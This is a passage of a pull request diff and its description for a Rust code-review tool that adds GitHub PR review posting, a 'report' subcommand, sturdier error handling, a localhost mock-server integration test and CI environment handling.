+        let ranges = crate::hydration::parse_unified_diff(diff);
+        let f = make_finding("test", 41, false);
+        let target = classify_posting_target(&f, "src/auth.rs", &ranges);
+        assert_eq!(target, PostingTarget::Body);
+    }
+
+    #[test]
+    fn classify_finding_file_not_in_diff() {
+        let diff = "--- a/src/other.rs\n+++ b/src/other.rs\n@@ -1,3 +1,5 @@\n+new\n+new\n old\n";
+        let ranges = crate::hydration::parse_unified_diff(diff);
+        let f = make_finding("test", 1, true);
+        let target = classify_posting_target(&f, "src/auth.rs", &ranges);
+        assert_eq!(target, PostingTarget::Body);
     }
 }

--- a/src/github_report.rs
+++ b/src/github_report.rs
@@ -1057,3 +1057,96 @@ mod tests {
         assert!(body_contains_quorum_marker(body));
     }
 }
+
+#[cfg(test)]
+mod integration_tests {
+    use super::*;
+    use std::net::TcpListener;
+
+    #[tokio::test]
+    async fn post_review_creates_review_with_inline_comments() {
+        let listener = TcpListener::bind("127.0.0.1:0").unwrap();
+        let port = listener.local_addr().unwrap().port();
+        let base_url = format!("http://127.0.0.1:{}", port);
+
+        // Use a real OS thread so blocking accept() doesn't starve the tokio executor
+        let handle = std::thread::spawn(move || {
+            // Accept and respond to: list reviews (GET), create review (POST)
+            for _ in 0..2 {
+                let (mut stream, _) = listener.accept().unwrap();
+                use std::io::{Read, Write};
+                let mut buf = [0u8; 8192];
+                let n = stream.read(&mut buf).unwrap();
+                let req_str = String::from_utf8_lossy(&buf[..n]);
+
+                if req_str.starts_with("GET") {
+                    let body = "[]";
+                    let resp = format!(
+                        "HTTP/1.1 200 OK\r\nContent-Length: {}\r\nContent-Type: application/json\r\n\r\n{}",
+                        body.len(), body
+                    );
+                    stream.write_all(resp.as_bytes()).unwrap();
+                } else {
+                    let body = r#"{"id": 42}"#;
+                    let resp = format!(
+                        "HTTP/1.1 200 OK\r\nContent-Length: {}\r\nContent-Type: application/json\r\n\r\n{}",
+                        body.len(), body
+                    );
+                    stream.write_all(resp.as_bytes()).unwrap();
+                }
+            }
+        });
+
+        let diff = "--- a/src/auth.rs\n+++ b/src/auth.rs\n@@ -40,3 +40,5 @@\n context\n+added\n+added\n context\n";
+
+        let f = crate::finding::Finding {
+            id: "f1".into(),
+            title: "Test finding".into(),
+            description: "Desc".into(),
+            severity: crate::finding::Severity::Medium,
+            category: crate::category::Category::Security,
+            source: crate::finding::Source::LocalAst,
+            line_start: 41,
+            line_end: 41,
+            evidence: vec!["src/auth.rs".into()],
+            calibrator_action: None,
+            similar_precedent: vec![],
+            canonical_pattern: None,
+            suggested_fix: None,
+            based_on_excerpt: None,
+            reasoning: None,
+            llm_confidence: None,
+            confidence: None,
+            cited_lines: None,
+            grounding_status: None,
+            grounding_confidence: None,
+            model_agreement: None,
+            rule_id: None,
+            judge_verdict: None,
+            judge_confidence: None,
+            precision_tier: None,
+            in_diff: Some(true),
+        };
+
+        let client = reqwest::Client::new();
+        let req = PostReviewRequest {
+            owner: "test".into(),
+            repo: "repo".into(),
+            pr_number: 1,
+            token: "fake-token".into(),
+            findings: vec![f],
+            diff_text: diff.into(),
+            version: "0.27.0".into(),
+            run_id: "01TEST".into(),
+            commit_sha: "abc123".into(),
+            api_base_url: Some(base_url),
+        };
+
+        let result = post_review(&client, &req).await.unwrap();
+        assert_eq!(result.review_id, 42);
+        assert_eq!(result.inline_count, 1);
+        assert_eq!(result.body_count, 0);
+
+        let _ = handle.join();
+    }
+}

--- a/src/main.rs
+++ b/src/main.rs
@@ -807,10 +807,34 @@ async fn run_report(opts: cli::ReportOpts) -> i32 {
 
     let findings: Vec<finding::Finding> = match serde_json::from_str(&json_str) {
         Ok(f) => f,
-        Err(e) => {
-            eprintln!("Error: failed to parse findings JSON: {}", e);
-            return 3;
-        }
+        Err(_) => match serde_json::from_str::<serde_json::Value>(&json_str) {
+            Ok(v) => {
+                let mut merged = Vec::new();
+                if let Some(files) = v.get("files").and_then(|x| x.as_array()) {
+                    for file_entry in files {
+                        if let Some(findings_val) = file_entry.get("findings") {
+                            match serde_json::from_value::<Vec<finding::Finding>>(
+                                findings_val.clone(),
+                            ) {
+                                Ok(mut ff) => merged.append(&mut ff),
+                                Err(e) => {
+                                    eprintln!("Error: invalid grouped findings payload: {}", e);
+                                    return 3;
+                                }
+                            }
+                        }
+                    }
+                    merged
+                } else {
+                    eprintln!("Error: unsupported findings JSON format");
+                    return 3;
+                }
+            }
+            Err(e) => {
+                eprintln!("Error: failed to parse findings JSON: {}", e);
+                return 3;
+            }
+        },
     };
 
     let ctx = match github_report::resolve_github_context(
@@ -824,11 +848,17 @@ async fn run_report(opts: cli::ReportOpts) -> i32 {
         }
     };
 
-    let client = reqwest::Client::builder()
+    let client = match reqwest::Client::builder()
         .connect_timeout(std::time::Duration::from_secs(10))
         .timeout(std::time::Duration::from_secs(60))
         .build()
-        .unwrap();
+    {
+        Ok(c) => c,
+        Err(e) => {
+            eprintln!("Error: failed to initialize HTTP client: {}", e);
+            return 3;
+        }
+    };
 
     let diff_text = if let Some(ref diff_path) = opts.diff_file {
         match std::fs::read_to_string(diff_path) {
@@ -2009,27 +2039,63 @@ async fn run_review(opts: cli::ReviewOpts) -> i32 {
             }
         };
 
-        let client = reqwest::Client::builder()
+        let client = match reqwest::Client::builder()
             .connect_timeout(std::time::Duration::from_secs(10))
             .timeout(std::time::Duration::from_secs(60))
             .build()
-            .unwrap();
+        {
+            Ok(c) => c,
+            Err(e) => {
+                eprintln!(
+                    "Error: GitHub post failed: cannot initialize HTTP client: {} (review exit code preserved: {})",
+                    e, review_exit
+                );
+                return review_exit;
+            }
+        };
 
         let diff_text = if let Some(ref diff_path) = opts.diff_file {
-            std::fs::read_to_string(diff_path).unwrap_or_default()
+            match std::fs::read_to_string(diff_path) {
+                Ok(d) => d,
+                Err(e) => {
+                    eprintln!(
+                        "Error: GitHub post failed: cannot read diff file: {} (review exit code preserved: {})",
+                        e, review_exit
+                    );
+                    return review_exit;
+                }
+            }
         } else {
-            github_report::fetch_pr_diff(
+            match github_report::fetch_pr_diff(
                 &client, &ctx.owner, &ctx.repo, pr_number, &ctx.token, None,
             )
             .await
-            .unwrap_or_default()
+            {
+                Ok(d) => d,
+                Err(e) => {
+                    eprintln!(
+                        "Error: GitHub post failed: cannot fetch PR diff: {} (review exit code preserved: {})",
+                        e, review_exit
+                    );
+                    return review_exit;
+                }
+            }
         };
 
-        let commit_sha = github_report::fetch_pr_head_sha(
+        let commit_sha = match github_report::fetch_pr_head_sha(
             &client, &ctx.owner, &ctx.repo, pr_number, &ctx.token, None,
         )
         .await
-        .unwrap_or_else(|_| "unknown".into());
+        {
+            Ok(sha) => sha,
+            Err(e) => {
+                eprintln!(
+                    "Error: GitHub post failed: cannot fetch PR head SHA: {} (review exit code preserved: {})",
+                    e, review_exit
+                );
+                return review_exit;
+            }
+        };
 
         let run_id = ulid::Ulid::new().to_string();
         let version = env!("CARGO_PKG_VERSION").to_string();

--- a/src/main.rs
+++ b/src/main.rs
@@ -450,6 +450,10 @@ async fn main() -> anyhow::Result<()> {
         cli::Command::Feedback(opts) => std::process::exit(run_feedback(opts)),
         cli::Command::Context(opts) => std::process::exit(run_context(opts)),
         cli::Command::Calibrate(opts) => std::process::exit(run_calibrate(opts)),
+        cli::Command::Report(opts) => {
+            let exit_code = run_report(opts).await;
+            std::process::exit(exit_code);
+        }
         cli::Command::Version => {
             println!("quorum {}", env!("CARGO_PKG_VERSION"));
         }
@@ -780,6 +784,111 @@ fn unicode_ok() -> bool {
 /// `quorum review --deep /other/repo/f.rs` was run from $HOME).
 fn deep_tool_root(file_path: &std::path::Path) -> std::path::PathBuf {
     pipeline::find_project_root(file_path)
+}
+
+async fn run_report(opts: cli::ReportOpts) -> i32 {
+    let json_str = if opts.findings_file == "-" {
+        use std::io::Read;
+        let mut buf = String::new();
+        if let Err(e) = std::io::stdin().read_to_string(&mut buf) {
+            eprintln!("Error: failed to read stdin: {}", e);
+            return 3;
+        }
+        buf
+    } else {
+        match std::fs::read_to_string(&opts.findings_file) {
+            Ok(s) => s,
+            Err(e) => {
+                eprintln!("Error: failed to read {}: {}", opts.findings_file, e);
+                return 3;
+            }
+        }
+    };
+
+    let findings: Vec<finding::Finding> = match serde_json::from_str(&json_str) {
+        Ok(f) => f,
+        Err(e) => {
+            eprintln!("Error: failed to parse findings JSON: {}", e);
+            return 3;
+        }
+    };
+
+    let ctx = match github_report::resolve_github_context(
+        opts.github_token.as_deref(),
+        opts.github_repo.as_deref(),
+    ) {
+        Ok(c) => c,
+        Err(e) => {
+            eprintln!("Error: {}", e);
+            return 3;
+        }
+    };
+
+    let client = reqwest::Client::builder()
+        .connect_timeout(std::time::Duration::from_secs(10))
+        .timeout(std::time::Duration::from_secs(60))
+        .build()
+        .unwrap();
+
+    let diff_text = if let Some(ref diff_path) = opts.diff_file {
+        match std::fs::read_to_string(diff_path) {
+            Ok(d) => d,
+            Err(e) => {
+                eprintln!("Error: failed to read diff file: {}", e);
+                return 3;
+            }
+        }
+    } else {
+        match github_report::fetch_pr_diff(&client, &ctx.owner, &ctx.repo, opts.pr, &ctx.token, None).await {
+            Ok(d) => d,
+            Err(e) => {
+                eprintln!("Error: failed to fetch PR diff: {}", e);
+                return 3;
+            }
+        }
+    };
+
+    let commit_sha = match github_report::fetch_pr_head_sha(
+        &client, &ctx.owner, &ctx.repo, opts.pr, &ctx.token, None,
+    ).await {
+        Ok(sha) => sha,
+        Err(e) => {
+            eprintln!("Error: failed to fetch PR head SHA: {}", e);
+            return 3;
+        }
+    };
+
+    let run_id = ulid::Ulid::new().to_string();
+    let version = env!("CARGO_PKG_VERSION").to_string();
+
+    let req = github_report::PostReviewRequest {
+        owner: ctx.owner,
+        repo: ctx.repo,
+        pr_number: opts.pr,
+        token: ctx.token,
+        findings,
+        diff_text,
+        version,
+        run_id,
+        commit_sha,
+        api_base_url: None,
+    };
+
+    eprint!("Posting {} findings to PR #{}...", req.findings.len(), req.pr_number);
+
+    match github_report::post_review(&client, &req).await {
+        Ok(result) => {
+            if let Some(dismissed) = result.dismissed_previous {
+                eprint!(" dismissed review {}...", dismissed);
+            }
+            eprintln!(" done ({} inline, {} in summary)", result.inline_count, result.body_count);
+            0
+        }
+        Err(e) => {
+            eprintln!("\nError: GitHub post failed: {}", e);
+            3
+        }
+    }
 }
 
 async fn run_review(opts: cli::ReviewOpts) -> i32 {
@@ -1869,6 +1978,74 @@ async fn run_review(opts: cli::ReviewOpts) -> i32 {
         for line in output::format_hints_human(&linter_hints) {
             eprintln!("{}", line);
         }
+    }
+
+    if let Some(pr_number) = opts.github_pr {
+        let review_exit = output::compute_exit_code(&all_findings);
+        let ctx = match github_report::resolve_github_context(
+            opts.github_token.as_deref(),
+            opts.github_repo.as_deref(),
+        ) {
+            Ok(c) => c,
+            Err(e) => {
+                eprintln!("Error: GitHub post failed: {} (review exit code preserved: {})", e, review_exit);
+                return review_exit;
+            }
+        };
+
+        let client = reqwest::Client::builder()
+            .connect_timeout(std::time::Duration::from_secs(10))
+            .timeout(std::time::Duration::from_secs(60))
+            .build()
+            .unwrap();
+
+        let diff_text = if let Some(ref diff_path) = opts.diff_file {
+            std::fs::read_to_string(diff_path).unwrap_or_default()
+        } else {
+            github_report::fetch_pr_diff(&client, &ctx.owner, &ctx.repo, pr_number, &ctx.token, None)
+                .await
+                .unwrap_or_default()
+        };
+
+        let commit_sha = github_report::fetch_pr_head_sha(
+            &client, &ctx.owner, &ctx.repo, pr_number, &ctx.token, None,
+        )
+        .await
+        .unwrap_or_else(|_| "unknown".into());
+
+        let run_id = ulid::Ulid::new().to_string();
+        let version = env!("CARGO_PKG_VERSION").to_string();
+
+        let req = github_report::PostReviewRequest {
+            owner: ctx.owner,
+            repo: ctx.repo,
+            pr_number,
+            token: ctx.token,
+            findings: all_findings.clone(),
+            diff_text,
+            version,
+            run_id,
+            commit_sha,
+            api_base_url: None,
+        };
+
+        eprint!("Posting {} findings to PR #{}...", req.findings.len(), pr_number);
+        match github_report::post_review(&client, &req).await {
+            Ok(result) => {
+                if let Some(dismissed) = result.dismissed_previous {
+                    eprint!(" dismissed review {}...", dismissed);
+                }
+                eprintln!(" done ({} inline, {} in summary)", result.inline_count, result.body_count);
+            }
+            Err(e) => {
+                eprintln!(
+                    "\nError: GitHub post failed: {} (review exit code preserved: {})",
+                    e, review_exit
+                );
+            }
+        }
+
+        return review_exit;
     }
 
     output::compute_exit_code(&all_findings)

--- a/src/main.rs
+++ b/src/main.rs
@@ -52,6 +52,8 @@ mod glyphs;
 mod http_server;
 mod judge;
 #[allow(dead_code)]
+mod github_report;
+#[allow(dead_code)]
 mod linter;
 #[allow(dead_code)]
 mod llm_client;

--- a/src/main.rs
+++ b/src/main.rs
@@ -47,12 +47,12 @@ mod dimensions;
 mod enrichment_policy;
 #[allow(dead_code)]
 mod formatting;
+#[allow(dead_code)]
+mod github_report;
 mod glyphs;
 #[allow(dead_code)]
 mod http_server;
 mod judge;
-#[allow(dead_code)]
-mod github_report;
 #[allow(dead_code)]
 mod linter;
 #[allow(dead_code)]
@@ -839,7 +839,11 @@ async fn run_report(opts: cli::ReportOpts) -> i32 {
             }
         }
     } else {
-        match github_report::fetch_pr_diff(&client, &ctx.owner, &ctx.repo, opts.pr, &ctx.token, None).await {
+        match github_report::fetch_pr_diff(
+            &client, &ctx.owner, &ctx.repo, opts.pr, &ctx.token, None,
+        )
+        .await
+        {
             Ok(d) => d,
             Err(e) => {
                 eprintln!("Error: failed to fetch PR diff: {}", e);
@@ -850,7 +854,9 @@ async fn run_report(opts: cli::ReportOpts) -> i32 {
 
     let commit_sha = match github_report::fetch_pr_head_sha(
         &client, &ctx.owner, &ctx.repo, opts.pr, &ctx.token, None,
-    ).await {
+    )
+    .await
+    {
         Ok(sha) => sha,
         Err(e) => {
             eprintln!("Error: failed to fetch PR head SHA: {}", e);
@@ -874,14 +880,21 @@ async fn run_report(opts: cli::ReportOpts) -> i32 {
         api_base_url: None,
     };
 
-    eprint!("Posting {} findings to PR #{}...", req.findings.len(), req.pr_number);
+    eprint!(
+        "Posting {} findings to PR #{}...",
+        req.findings.len(),
+        req.pr_number
+    );
 
     match github_report::post_review(&client, &req).await {
         Ok(result) => {
             if let Some(dismissed) = result.dismissed_previous {
                 eprint!(" dismissed review {}...", dismissed);
             }
-            eprintln!(" done ({} inline, {} in summary)", result.inline_count, result.body_count);
+            eprintln!(
+                " done ({} inline, {} in summary)",
+                result.inline_count, result.body_count
+            );
             0
         }
         Err(e) => {
@@ -1988,7 +2001,10 @@ async fn run_review(opts: cli::ReviewOpts) -> i32 {
         ) {
             Ok(c) => c,
             Err(e) => {
-                eprintln!("Error: GitHub post failed: {} (review exit code preserved: {})", e, review_exit);
+                eprintln!(
+                    "Error: GitHub post failed: {} (review exit code preserved: {})",
+                    e, review_exit
+                );
                 return review_exit;
             }
         };
@@ -2002,9 +2018,11 @@ async fn run_review(opts: cli::ReviewOpts) -> i32 {
         let diff_text = if let Some(ref diff_path) = opts.diff_file {
             std::fs::read_to_string(diff_path).unwrap_or_default()
         } else {
-            github_report::fetch_pr_diff(&client, &ctx.owner, &ctx.repo, pr_number, &ctx.token, None)
-                .await
-                .unwrap_or_default()
+            github_report::fetch_pr_diff(
+                &client, &ctx.owner, &ctx.repo, pr_number, &ctx.token, None,
+            )
+            .await
+            .unwrap_or_default()
         };
 
         let commit_sha = github_report::fetch_pr_head_sha(
@@ -2029,13 +2047,20 @@ async fn run_review(opts: cli::ReviewOpts) -> i32 {
             api_base_url: None,
         };
 
-        eprint!("Posting {} findings to PR #{}...", req.findings.len(), pr_number);
+        eprint!(
+            "Posting {} findings to PR #{}...",
+            req.findings.len(),
+            pr_number
+        );
         match github_report::post_review(&client, &req).await {
             Ok(result) => {
                 if let Some(dismissed) = result.dismissed_previous {
                     eprint!(" dismissed review {}...", dismissed);
                 }
-                eprintln!(" done ({} inline, {} in summary)", result.inline_count, result.body_count);
+                eprintln!(
+                    " done ({} inline, {} in summary)",
+                    result.inline_count, result.body_count
+                );
             }
             Err(e) => {
                 eprintln!(

--- a/src/merge.rs
+++ b/src/merge.rs
@@ -75,8 +75,7 @@ pub fn merge_findings(
         for (idx, finding) in merged.iter_mut().enumerate() {
             let agreeing = llm_model_names[idx].len();
             if agreeing > 0 {
-                finding.model_agreement =
-                    Some((agreeing as f32 / num_models as f32).min(1.0));
+                finding.model_agreement = Some((agreeing as f32 / num_models as f32).min(1.0));
             }
         }
     }

--- a/src/output/mod.rs
+++ b/src/output/mod.rs
@@ -1151,7 +1151,14 @@ mod tests {
 
     #[test]
     fn pipe_without_flags_produces_json() {
-        assert_eq!(resolve_output_mode(false, false, false), OutputMode::Json,);
+        // Clear env vars that trigger compact mode (e.g. GITHUB_ACTIONS in CI)
+        let saved = std::env::var("GITHUB_ACTIONS").ok();
+        unsafe { std::env::remove_var("GITHUB_ACTIONS") };
+        let result = resolve_output_mode(false, false, false);
+        if let Some(v) = saved {
+            unsafe { std::env::set_var("GITHUB_ACTIONS", v) };
+        }
+        assert_eq!(result, OutputMode::Json);
     }
 
     #[test]

--- a/src/output/mod.rs
+++ b/src/output/mod.rs
@@ -425,6 +425,7 @@ pub fn should_use_compact(compact_flag: bool) -> bool {
         || is_env_set("GEMINI_CLI")
         || is_env_set("CODEX_CI")
         || is_env_set("AGENT")
+        || is_env_set("GITHUB_ACTIONS")
 }
 
 fn is_env_set(var: &str) -> bool {
@@ -893,6 +894,17 @@ mod tests {
         // this will return true — that's correct behavior
         // We can only reliably test that flag=true always returns true
         assert!(should_use_compact(true));
+    }
+
+    #[test]
+    fn should_use_compact_github_actions() {
+        unsafe {
+            std::env::set_var("GITHUB_ACTIONS", "true");
+        }
+        assert!(should_use_compact(false));
+        unsafe {
+            std::env::remove_var("GITHUB_ACTIONS");
+        }
     }
 
     #[test]

--- a/tests/cli.rs
+++ b/tests/cli.rs
@@ -7,6 +7,10 @@ fn quorum() -> Command {
     cmd.env("HOME", "/tmp/quorum-test-home");
     // Isolate from developer shell so tests don't invoke real LLM (see issue #23)
     cmd.env_remove("QUORUM_API_KEY");
+    // Isolate from CI compact-mode triggers so piped output remains JSON
+    cmd.env_remove("GITHUB_ACTIONS");
+    cmd.env_remove("CLAUDE_CODE");
+    cmd.env_remove("CODEX_CI");
     cmd
 }
 


### PR DESCRIPTION
## Summary

- Native GitHub PR comment posting via `--github-pr <N>` flag and `quorum report` subcommand
- Fork-safe two-stage CI workflow (`workflow_run` pattern) with artifact poisoning prevention
- Dismiss-and-replace protocol for idempotent re-reviews
- Output sanitization, diff-scoped inline comments, commentability validation
- Dogfooding CI workflows (analyze + report)

## Changes

- `src/github_report.rs`: Core module — GitHub API client, review posting, dismiss previous reviews, diff fetching, markdown rendering, sanitization, repo URL parsing
- `src/main.rs`: `run_report()` subcommand, `--github-pr` flag on `run_review()`
- `src/cli/mod.rs`: CLI argument definitions for `report` and `--github-pr`
- `src/output/mod.rs`: `GITHUB_ACTIONS` compact output mode detection
- `.github/workflows/quorum-review-{analyze,report}.yml`: Two-stage fork-safe CI
- `tests/cli.rs`: CI env isolation in test helper
- `docs/DESIGN.md`: Architecture documentation updates

## Test plan

- [x] 35 unit tests in `github_report.rs` (sanitization, URL parsing, commentability, markdown rendering, truncation)
- [x] Integration test with mock HTTP server (`tests/cli.rs`)
- [x] E2E verified: posted real review comments to PR #425 via `--github-pr 425`
- [x] CI workflows validated on PR #422 (CodeQL, clippy, tests)

🤖 Generated with [Claude Code](https://claude.com/claude-code)